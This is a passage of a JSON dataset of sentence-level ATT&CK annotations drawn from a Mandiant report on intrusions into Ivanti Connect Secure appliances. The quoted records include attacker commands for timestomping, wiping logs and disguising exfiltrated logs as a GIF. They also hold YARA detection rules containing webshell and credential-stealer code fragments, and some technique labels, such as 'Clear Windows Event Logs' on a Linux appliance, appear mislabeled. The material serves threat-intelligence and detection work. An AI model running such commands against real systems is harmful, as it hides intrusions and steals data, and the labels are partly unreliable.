"Infrastructure_Indicator" }, { "text": "/tmp/testt", "start": 203, "end": 213, "label": "Infrastructure_Indicator" }, { "text": "/home/webserver/htdocs/dana-na/css", "start": 214, "end": 248, "label": "Infrastructure_Indicator" }, { "text": "/tmp/testt", "start": 257, "end": 267, "label": "Infrastructure_Indicator" }, { "text": "/data/var/dlogs/config_rest_server.log", "start": 276, "end": 314, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s131-63b1f3", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 131, "context_before": "Remount the file system as read-write Archive the dump into a CSS file within /home/webserver/htdocs/dana-na/css/ Delete /tmp/test1.txt rm -rf /home/webserver/htdocs/dana-na/css/.css;\ntouch -r /tmp/testt /home/webserver/htdocs/dana-na/css;\nrm -rf /tmp/testt;\necho > /data/var/dlogs/config_rest_server.log;\nmount -o ro,remount/", "sentence_text": "The command sequence does the following:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s132-4c0844", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 132, "context_before": "The command sequence does the following:", "sentence_text": "Delete the staged configuration and cache dump Timestomp the CSS directory with the modified and access timestamps of /tmp/testt", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" }, { "id": "T1070.006", "name": "Timestomp" } ], "procedure": "Delete configuration and cache dump and modify timestamps of the CSS directory to evade detection.", "entities": [ { "text": "Delete the staged configuration and cache dump", "start": 0, "end": 46, "label": "Action" }, { "text": "Timestomp the CSS directory with the modified and access timestamps of /tmp/testt", "start": 47, "end": 128, "label": "Action" }, { "text": "/tmp/testt", "start": 118, "end": 128, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s133-3d8a97", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 133, "context_before": "Delete the staged configuration and cache dump Timestomp the CSS directory with the modified and access timestamps of /tmp/testt", "sentence_text": "Clear the config_rest_server.log file that would record exploitation attempts of CVE-2023-46805 and CVE-2024-21887 Remount the file system in read-only mode, reverting it back to its original state Additionally, we have identified the configuration and dump being saved to compressed files located in the following paths:\n/runtime", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.001", "name": "Clear Windows Event Logs" } ], "procedure": "Clear log file and remount file system to remove traces and restore system state after exploitation.", "entities": [ { "text": "Clear the config_rest_server.log file", "start": 0, "end": 37, "label": "Action" }, { "text": "Remount the file system in read-only mode, reverting it back to its original state", "start": 115, "end": 197, "label": "Action" }, { "text": "config_rest_server.log", "start": 10, "end": 32, "label": "Infrastructure_Indicator" }, { "text": "/runtime", "start": 322, "end": 330, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s134-a36f2b", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 134, "context_before": "Clear the config_rest_server.log file that would record exploitation attempts of CVE-2023-46805 and CVE-2024-21887 Remount the file system in read-only mode, reverting it back to its original state Additionally, we have identified the configuration and dump being saved to compressed files located in the following paths:\n/runtime", "sentence_text": "/webserver/htdocs/dana-na/help/logo.gif\n/runtime/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s135-928a02", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 135, "context_before": "/webserver/htdocs/dana-na/help/logo.gif\n/runtime/", "sentence_text": "webserver/htdocs/dana-na/help/login.gif\nIvanti has published additional guidance on remediating the risk resulting from the cache and configuration dump.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s136-6ac0d3", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 136, "context_before": "webserver/htdocs/dana-na/help/login.gif\nIvanti has published additional guidance on remediating the risk resulting from the cache and configuration dump.", "sentence_text": "CAV Web Server Log Exfiltration /runtime/webserver/htdocs/dana-na/help/logo.gif .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s137-4a8fd4", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 137, "context_before": "CAV Web Server Log Exfiltration /runtime/webserver/htdocs/dana-na/help/logo.gif .", "sentence_text": "The path does not legitimately contain logo.gif /usr/bin/printf 'GIF'>/home/webserver/htdocs/dana-na/help/logo.gif;\n/usr/bin/printf 'GIF'>/home/webserver/htdocs/dana-na/help/logo.gif;\ncat /data/var/dlogs/cav_webserv.log|/usr/bin/base64>>/home/\nwebserver/htdocs/dana-na/help/logo.gif\nThe command redirects the GIF header into logo.gif and then appends the Base64-encoded contents of /data/var/dlogs/cav_webserv.log into the same file.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" }, { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Write GIF header to a file and append Base64-encoded log contents to conceal and exfiltrate data.", "entities": [ { "text": "/usr/bin/printf 'GIF'>/home/webserver/htdocs/dana-na/help/logo.gif", "start": 48, "end": 114, "label": "Action" }, { "text": "/usr/bin/printf 'GIF'>/home/webserver/htdocs/dana-na/help/logo.gif", "start": 116, "end": 182, "label": "Action" }, { "text": "cat /data/var/dlogs/cav_webserv.log|/usr/bin/base64>>/home/\nwebserver/htdocs/dana-na/help/logo.gif", "start": 184, "end": 282, "label": "Action" }, { "text": "appends the Base64-encoded contents of /data/var/dlogs/cav_webserv.log into the same file", "start": 343, "end": 432, "label": "Action" }, { "text": "/home/webserver/htdocs/dana-na/help/logo.gif", "start": 70, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "/home/webserver/htdocs/dana-na/help/logo.gif", "start": 138, "end": 182, "label": "Infrastructure_Indicator" }, { "text": "/data/var/dlogs/cav_webserv.log", "start": 188, "end": 219, "label": "Infrastructure_Indicator" }, { "text": "/home/\nwebserver/htdocs/dana-na/help/logo.gif", "start": 237, "end": 282, "label": "Infrastructure_Indicator" }, { "text": "/data/var/dlogs/cav_webserv.log", "start": 382, "end": 413, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s138-e4911d", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 138, "context_before": "The path does not legitimately contain logo.gif /usr/bin/printf 'GIF'>/home/webserver/htdocs/dana-na/help/logo.gif;\n/usr/bin/printf 'GIF'>/home/webserver/htdocs/dana-na/help/logo.gif;\ncat /data/var/dlogs/cav_webserv.log|/usr/bin/base64>>/home/\nwebserver/htdocs/dana-na/help/logo.gif\nThe command redirects the GIF header into logo.gif and then appends the Base64-encoded contents of /data/var/dlogs/cav_webserv.log into the same file.", "sentence_text": "cav_webserv.log\ncontains web requests and logs maintained by uWSGI for the CAV REST API.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s139-d42093", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 139, "context_before": "cav_webserv.log\ncontains web requests and logs maintained by uWSGI for the CAV REST API.", "sentence_text": "Any requests to those web shells would be logged in this file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s140-16c16a", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 140, "context_before": "Any requests to those web shells would be logged in this file.", "sentence_text": "ICT Manipulation\nThe system's internal integrity checker tool can help detect modifications or additions made to the file system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s141-8551b4", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 141, "context_before": "ICT Manipulation\nThe system's internal integrity checker tool can help detect modifications or additions made to the file system.", "sentence_text": "Mandiant has identified instances where the external ICT detected a modification to a Python package associated with the internal ICT:\n/home/venv3/lib/python3.6/site-packages/scanner-0.1-py3.6.egg\nWe identified a single line commented out in scanmgr.py that disables the execution of the scanner.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "Modify a Python package by commenting out a line in scanmgr.py to disable the scanner execution.", "entities": [ { "text": "detected a modification to a Python package associated with the internal ICT", "start": 57, "end": 133, "label": "Action" }, { "text": "commented out in scanmgr.py that disables the execution of the scanner", "start": 225, "end": 295, "label": "Action" }, { "text": "/home/venv3/lib/python3.6/site-packages/scanner-0.1-py3.6.egg", "start": 135, "end": 196, "label": "Infrastructure_Indicator" }, { "text": "scanmgr.py", "start": 242, "end": 252, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s142-f54e6e", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 142, "context_before": "Mandiant has identified instances where the external ICT detected a modification to a Python package associated with the internal ICT:\n/home/venv3/lib/python3.6/site-packages/scanner-0.1-py3.6.egg\nWe identified a single line commented out in scanmgr.py that disables the execution of the scanner.", "sentence_text": "Additionally, Volexity published a blog post on Jan. 18, 2024 detailing another method leveraged to tamper with the built-in integrity checker tool on a compromised Ivanti Connect Secure appliance.\n/home/etc/manifest\n.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s143-5159b2", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 143, "context_before": "Additionally, Volexity published a blog post on Jan. 18, 2024 detailing another method leveraged to tamper with the built-in integrity checker tool on a compromised Ivanti Connect Secure appliance.\n/home/etc/manifest\n.", "sentence_text": "This file maintains a list of the expected files on the system and its associated SHA256 hash.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s144-19c84f", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 144, "context_before": "This file maintains a list of the expected files on the system and its associated SHA256 hash.", "sentence_text": "The internal ICT verifies the manifest file’s signature using a public key.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s145-168048", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 145, "context_before": "The internal ICT verifies the manifest file’s signature using a public key.", "sentence_text": "In some instances, the threat actor failed to create a new digital signature of the manifest file.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1553", "name": "Subvert Trust Controls" } ], "procedure": "Fail to generate a new digital signature for the manifest file after modification, impacting trust validation.", "entities": [ { "text": "failed to create a new digital signature of the manifest file", "start": 36, "end": 97, "label": "Action" }, { "text": "the threat actor", "start": 19, "end": 35, "label": "ThreatActor" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s146-90d787", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 146, "context_before": "In some instances, the threat actor failed to create a new digital signature of the manifest file.", "sentence_text": "This causes the internal ICT to fail and generates event ID SYS32042 in the system event log, indicating that the manifest file is bad.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s147-1d1344", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 147, "context_before": "This causes the internal ICT to fail and generates event ID SYS32042 in the system event log, indicating that the manifest file is bad.", "sentence_text": "The full list of event IDs associated with the integrity checker tool can be found in Table 3.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s148-9866b7", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 148, "context_before": "The full list of event IDs associated with the integrity checker tool can be found in Table 3.", "sentence_text": "System Log Clearing In some instances, the threat actor used a legitimate system utility, /home/bin/logClear.pl to clear system logs.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.001", "name": "Clear Windows Event Logs" } ], "procedure": "Use a legitimate utility to clear system logs to remove evidence of activity.", "entities": [ { "text": "the threat actor", "start": 39, "end": 55, "label": "ThreatActor" }, { "text": "used a legitimate system utility, /home/bin/logClear.pl to clear system logs", "start": 56, "end": 132, "label": "Action" }, { "text": "/home/bin/logClear.pl", "start": 90, "end": 111, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-28_mandiant_report-p1-s149-aa4eb6", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 149, "context_before": "System Log Clearing In some instances, the threat actor used a legitimate system utility, /home/bin/logClear.pl to clear system logs.", "sentence_text": "The clearing of system logs via this method generates event ID ADM20599 in the admin event log for each log type cleared.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s150-ebbe71", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 150, "context_before": "The clearing of system logs via this method generates event ID ADM20599 in the admin event log for each log type cleared.", "sentence_text": "There are six (6) system logs available on an Ivanti Connect Secure appliance.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s151-4733dd", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 151, "context_before": "There are six (6) system logs available on an Ivanti Connect Secure appliance.", "sentence_text": "ADM20599\nin the events log ( log.events.vc0 ) for evidence of log clearing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s152-dc370d", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 152, "context_before": "ADM20599\nin the events log ( log.events.vc0 ) for evidence of log clearing.", "sentence_text": "Attribution\nRecommendations\nPatch Availability\nIvanti is releasing the first round of patches for specific versions of Ivanti Connect Secure starting on Jan. 31, 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s153-3380f7", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 153, "context_before": "Attribution\nRecommendations\nPatch Availability\nIvanti is releasing the first round of patches for specific versions of Ivanti Connect Secure starting on Jan. 31, 2024.", "sentence_text": "The remaining patches will be released on a staggered schedule for three different products that span multiple branches and versions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s154-224375", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 154, "context_before": "The remaining patches will be released on a staggered schedule for three different products that span multiple branches and versions.", "sentence_text": "Installing the Mitigation Affected customers should install the mitigation immediately if a patch is not yet available for their version.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s155-91ac3b", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 155, "context_before": "Installing the Mitigation Affected customers should install the mitigation immediately if a patch is not yet available for their version.", "sentence_text": "Installing the mitigation is intended to prevent future exploitation of the two vulnerabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s156-cb820f", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 156, "context_before": "Installing the mitigation is intended to prevent future exploitation of the two vulnerabilities.", "sentence_text": "It is not intended to remediate or otherwise contain an existing compromised device.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s157-1143f2", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 157, "context_before": "It is not intended to remediate or otherwise contain an existing compromised device.", "sentence_text": "On Jan. 20, 2024, Ivanti released details related to a condition that would negatively impact the mitigation and render appliances in a vulnerable state.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s158-2c9a0d", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 158, "context_before": "On Jan. 20, 2024, Ivanti released details related to a condition that would negatively impact the mitigation and render appliances in a vulnerable state.", "sentence_text": "The condition impacts customers who push configurations to appliances using Ivanti Neurons for Secure Access (nSA) or Pulse One.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s159-469d56", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 159, "context_before": "The condition impacts customers who push configurations to appliances using Ivanti Neurons for Secure Access (nSA) or Pulse One.", "sentence_text": "Ivanti recommends customers to stop pushing configurations to appliances with the XML in place until patches are installed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s160-22bccb", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 160, "context_before": "Ivanti recommends customers to stop pushing configurations to appliances with the XML in place until patches are installed.", "sentence_text": "Integrity Checker Tool Ivanti customers are still encouraged to first run and review their logs for historical hits by the internal Integrity Checker Tool (ICT).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s161-aa079e", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 161, "context_before": "Integrity Checker Tool Ivanti customers are still encouraged to first run and review their logs for historical hits by the internal Integrity Checker Tool (ICT).", "sentence_text": "If the internal ICT comes back with no results, customers should then run the external ICT as it is more robust and resistant to tampering.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s162-b1e042", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 162, "context_before": "If the internal ICT comes back with no results, customers should then run the external ICT as it is more robust and resistant to tampering.", "sentence_text": "Customers should share the ICT results with Ivanti for further analysis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s163-54f31c", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 163, "context_before": "Customers should share the ICT results with Ivanti for further analysis.", "sentence_text": "Ivanti will make a determination if the appliance is compromised and recommend next steps.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s165-ac6b52", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 165, "context_before": "Password Resets", "sentence_text": "In addition to resetting the password of any local user configured on the appliance, Mandiant advises that organizations affected by the WARPWIRE credential stealer reset passwords of any users who authenticated to the appliance during the period when the malware was active.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s166-697b81", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 166, "context_before": "In addition to resetting the password of any local user configured on the appliance, Mandiant advises that organizations affected by the WARPWIRE credential stealer reset passwords of any users who authenticated to the appliance during the period when the malware was active.", "sentence_text": "We also recommend customers search EDR telemetry and firewall logs for traffic to the WARPWIRE credential harvester C2 addresses listed in the IOCs section.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s167-8cd898", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 167, "context_before": "Hardening Guide\nWe have released a guidance document, which contains remediation and hardening recommendations for suspected compromised Ivanti Connect Secure (CS) VPN appliances associated with the exploitation of CVE-2023-46805, CVE-2024-21887, CVE-2024-21888, and CVE-2024-21893.", "sentence_text": "Hardening Guide\nWe have released a guidance document, which contains remediation and hardening recommendations for suspected compromised Ivanti Connect Secure (CS) VPN appliances associated with the exploitation of CVE-2023-46805, CVE-2024-21887, CVE-2024-21888, and CVE-2024-21893.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s168-851033", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 168, "context_before": "Acknowledgements\nWe would like to thank Ivanti for their continued partnership, support, and transparency following the exploitation of CVE-2023-46805, CVE-2024-21887, CVE-2024-21888, and CVE-2024-21893.", "sentence_text": "Acknowledgements\nWe would like to thank Ivanti for their continued partnership, support, and transparency following the exploitation of CVE-2023-46805 and CVE-2024-21887 by UNC5221.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s169-1728ca", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 169, "context_before": "Acknowledgements\nWe would like to thank Ivanti for their continued partnership, support, and transparency following the exploitation of CVE-2023-46805 and CVE-2024-21887 by UNC5221.", "sentence_text": "author = \"Mandiant\" description = \"This rule detects the CHAINLINE webshell, which receives RC4 encrypted commands and returns the execution result\" md5 = \"3045f5b3d355a9ab26ab6f44cc831a83\" strings:\n$s1 = \"crypt(command: str)\" ascii $s2 = \"tmp[i]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s170-977d8d", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 170, "context_before": "author = \"Mandiant\" description = \"This rule detects the CHAINLINE webshell, which receives RC4 encrypted commands and returns the execution result\" md5 = \"3045f5b3d355a9ab26ab6f44cc831a83\" strings:\n$s1 = \"crypt(command: str)\" ascii $s2 = \"tmp[i]", "sentence_text": "= chr(ord(tmp[i])\" ascii $s3 = \"ord(RC4_KEY[i % len(RC4_KEY)])\" ascii $s4 = \"class Health(Resource)\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s171-47c01e", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 171, "context_before": "= chr(ord(tmp[i])\" ascii $s3 = \"ord(RC4_KEY[i % len(RC4_KEY)])\" ascii $s4 = \"class Health(Resource)\"", "sentence_text": "ascii $s5 = \"crypt(base64.b64decode(command.encode(\" ascii $s6 = \"base64.b64encode(crypt(result)\" ascii $s7 = \"{\\\"message\\\": 'ok', \\\"stats\\\": result}\" ascii condition:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s172-3d700a", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 172, "context_before": "ascii $s5 = \"crypt(base64.b64decode(command.encode(\" ascii $s6 = \"base64.b64encode(crypt(result)\" ascii $s7 = \"{\\\"message\\\": 'ok', \\\"stats\\\": result}\" ascii condition:", "sentence_text": "filesize < 100KB and any of them } rule M_HUNTING_APT_Webshell_FRAMESTING_result { meta:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s173-98c0a4", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 173, "context_before": "filesize < 100KB and any of them } rule M_HUNTING_APT_Webshell_FRAMESTING_result { meta:", "sentence_text": "author = \"Mandiant\" description = \"Detects strings associated with FRAMESTING webshell\" md5 = \"465600cece80861497e8c1c86a07a23e\" strings:\n$s1 = \"exec(zlib.decompress(aes.decrypt(base64.b64decode(data))), {'request':request,'cache'\" $s2 = \"result={'message':'','action':0}\" condition:\nany of them } rule M_Hunting_Webshell_LIGHTWIRE_4 { meta:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s174-0426bf", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 174, "context_before": "author = \"Mandiant\" description = \"Detects strings associated with FRAMESTING webshell\" md5 = \"465600cece80861497e8c1c86a07a23e\" strings:\n$s1 = \"exec(zlib.decompress(aes.decrypt(base64.b64decode(data))), {'request':request,'cache'\" $s2 = \"result={'message':'','action':0}\" condition:\nany of them } rule M_Hunting_Webshell_LIGHTWIRE_4 { meta:", "sentence_text": "author = \"Mandiant\" description = \"Detects LIGHTWIRE based on the RC4 decoding and execution 1-liner.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s175-b9539a", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 175, "context_before": "author = \"Mandiant\" description = \"Detects LIGHTWIRE based on the RC4 decoding and execution 1-liner.\"", "sentence_text": "md5 = \"3d97f55a03ceb4f71671aa2ecf5b24e9\" strings:\n$re1 = /eval\\{my.{1,20}Crypt::RC4->new\\(\\\".{1,50}->RC4\\(decode_base64\\", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s176-14cc52", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 176, "context_before": "md5 = \"3d97f55a03ceb4f71671aa2ecf5b24e9\" strings:\n$re1 = /eval\\{my.{1,20}Crypt::RC4->new\\(\\\".{1,50}->RC4\\(decode_base64\\", "sentence_text": "(CGI::param\\(\\'.{1,30};eval\\s\\$.{1,30}\\\"Compatibility\\scheck:\\s\\$@\\\";\\}/ condition:\nfilesize < 1MB and all of them } rule M_Hunting_CredTheft_WARPWIRE_strings { meta:\nauthor = \"Mandiant\" description = \"Detects strings within WARPWIRE credential harvester\" md5 = \"b15f47e234b5d26fb2cc81fc6fd89775\" strings:\n$header = \"function SetLastRealm(sValue) {\" // password fields $username = \"document.frmLogin.username.value;\" $password = \"document.frmLogin.password.value;\" // post version $btoa = \"btoa(\" $xhr_post = /xhr.open\\(.POST.,( )?url,/ // get version $xhr_get = /xhr.open\\(.GET.,( )?url,/ $xhr_send = \"xhr.send(null);\" condition:\n$header in (0..100)\nand $password in (@username[1]..@username[1]+100)\nand ((#btoa > 1 and $xhr_post) or ($xhr_send in (@xhr_get[1]..\n@xhr_get[1]+50)))\n}\nOrganizations can validate their security controls using the following actions with Posted in Threat Intelligence Related articles Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s177-8380e8", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 177, "context_before": "(CGI::param\\(\\'.{1,30};eval\\s\\$.{1,30}\\\"Compatibility\\scheck:\\s\\$@\\\";\\}/ condition:\nfilesize < 1MB and all of them } rule M_Hunting_CredTheft_WARPWIRE_strings { meta:\nauthor = \"Mandiant\" description = \"Detects strings within WARPWIRE credential harvester\" md5 = \"b15f47e234b5d26fb2cc81fc6fd89775\" strings:\n$header = \"function SetLastRealm(sValue) {\" // password fields $username = \"document.frmLogin.username.value;\" $password = \"document.frmLogin.password.value;\" // post version $btoa = \"btoa(\" $xhr_post = /xhr.open\\(.POST.,( )?url,/ // get version $xhr_get = /xhr.open\\(.GET.,( )?url,/ $xhr_send = \"xhr.send(null);\" condition:\n$header in (0..100)\nand $password in (@username[1]..@username[1]+100)\nand ((#btoa > 1 and $xhr_post) or ($xhr_send in (@xhr_get[1]..\n@xhr_get[1]+50)))\n}\nOrganizations can validate their security controls using the following actions with Posted in Threat Intelligence Related articles Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026", "sentence_text": "By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s178-feb06b", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 178, "context_before": "By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "The command contains the file path and its content to be saved on the compromised system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-28_mandiant_report-p1-s179-6ba6d8", "source": "mandiant", "doc_id": "28_mandiant_report", "page_number": 1, "sentence_id": 179, "context_before": "The command contains the file path and its content to be saved on the compromised system.", "sentence_text": "A reverse shell is created using /bin/sh and the provided command is executed CRACKMAPEXEC | CRACKMAPEXEC is a post-exploitation tool against Microsoft Windows environments.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" }, { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Create a reverse shell using /bin/sh and execute commands through it for remote control.", "entities": [ { "text": "is created using /bin/sh", "start": 16, "end": 40, "label": "Action" }, { "text": "is executed", "start": 66, "end": 77, "label": "Action" }, { "text": "/bin/sh", "start": 33, "end": 40, "label": 